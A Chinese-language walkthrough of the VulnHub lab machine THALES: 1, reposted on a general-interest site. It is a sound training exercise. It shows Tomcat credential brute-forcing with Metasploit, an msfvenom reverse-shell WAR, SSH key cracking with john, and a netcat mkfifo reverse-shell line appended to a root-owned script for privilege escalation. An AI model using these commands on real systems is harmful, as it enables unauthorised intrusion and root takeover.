1. 首頁 > 生活百科 > >

vulnhub靶場之THALES: 1

生活百科

準備:
攻擊機:虛擬機kali、本機win10 。
靶機:THALES: 1,網段地址我這里設置的橋接,所以與本機電腦在同一網段,下載地址:https://download.vulnhub.com/thales/Thales.zip,下載解壓后直接vbox打開即可 。
目標:獲取user.txt和root.txt 。
知識點:shell反彈、權限提升、tomcat弱口令、密匙破解(john)

vulnhub靶場之THALES: 1

文章插圖
信息收集:
通過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 192.168.100.0/24,獲得靶機地址:192.168.100.167 。這里因為是在酒店,這里連的的都是一個網絡,所以加了-sn,不然比較慢 。
vulnhub靶場之THALES: 1

文章插圖
掃描下開放的端口與對應的服務:nmap -T4 -sV -p- -A 192.168.100.167,顯示開放了22和8080端口 。
vulnhub靶場之THALES: 1

文章插圖
使用dirmap進行目錄掃描,但是未發現有用的目錄信息,訪問:http://192.168.100.167:8080/ , 發現是tomcat界面 , 在頁面點擊時發現需要登錄 。
vulnhub靶場之THALES: 1

文章插圖
爆破tomcat弱口令:
這里想到了之前的tomcat弱口令的問題(vuhub上也有這個的模擬環境),因此使用msf嘗試爆破下弱口令,在msf中搜索下tomcat漏洞,search tomcat,然后找到用于爆破弱口令的并使用 。
vulnhub靶場之THALES: 1

文章插圖
使用方式:use 19,然后設置下目標主機:set rhost 192.168.100.167 , (可以show options查看當前配置的信息),然后run即可 。成功獲得賬戶名和密碼:tomcat/role1 。
vulnhub靶場之THALES: 1

文章插圖

vulnhub靶場之THALES: 1

文章插圖
使用爆破獲得賬戶名和密碼:tomcat/role1,成功登錄到管理界面 。
vulnhub靶場之THALES: 1

文章插圖
獲取shell權限:
在應用程序列表中我們可以進行文件上傳和服務部署,因此構造一個反彈shell進行部署 , 生成反彈shell:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.96 LPORT=6688 -f war -o upfine.war,在kali開啟監聽:nc -lvp 6688,然后將upfine.war文件進行上傳部署并訪問,成功獲得shell權限 。使用python3 -c 'import pty;pty.spawn("/bin/bash")'升級下shell窗口 。
vulnhub靶場之THALES: 1

文章插圖

vulnhub靶場之THALES: 1

文章插圖
提權至thales:
在home/thales文件夾下發現了:notes.txt、user.txt、.ssh等文件,讀取下相關文件 , 告訴我們存在一個backup.sh腳本,user.txt文件無權限讀?。?嘗試使用密碼:role1進行嘗試 , 但是不對 。
vulnhub靶場之THALES: 1

文章插圖

vulnhub靶場之THALES: 1

文章插圖
那就先去查看下backup.sh文件的信息:ls -al和cat backup.sh,發現該文件具有root權限,文件內容定義的是備份什么內容,備份到哪去,備份方法和名稱等信息,這里我們可以寫入一個反彈shell,那在調用的時候就可以反彈一個root權限的shell,但是tomcat賬戶按這樣操作后顯示仍是tomcat權限 。
vulnhub靶場之THALES: 1

文章插圖
在.ssh下發現密匙:id_rsa文件,將密匙文件復制保存到本地文件upfine,然后命令:python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密碼本,然后命令:john --wordlist=/usr/share/wordlists/rockyou.txt passwd進行破解,成功獲取密碼:vodka06
vulnhub靶場之THALES: 1

文章插圖

vulnhub靶場之THALES: 1

文章插圖
切換thales賬戶:su thales,讀取下user.txt文件,成功獲取到flag信息 。
vulnhub靶場之THALES: 1

文章插圖
提權至root:
根據上面的我們發現的backup.sh文件具有root權限,那我們就插入一個反彈shell,然后執行backup.sh腳本,成功獲取root權限讀取到root.txt 。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.96 6688 >/tmp/f" >> backup.sh
vulnhub靶場之THALES: 1

推薦閱讀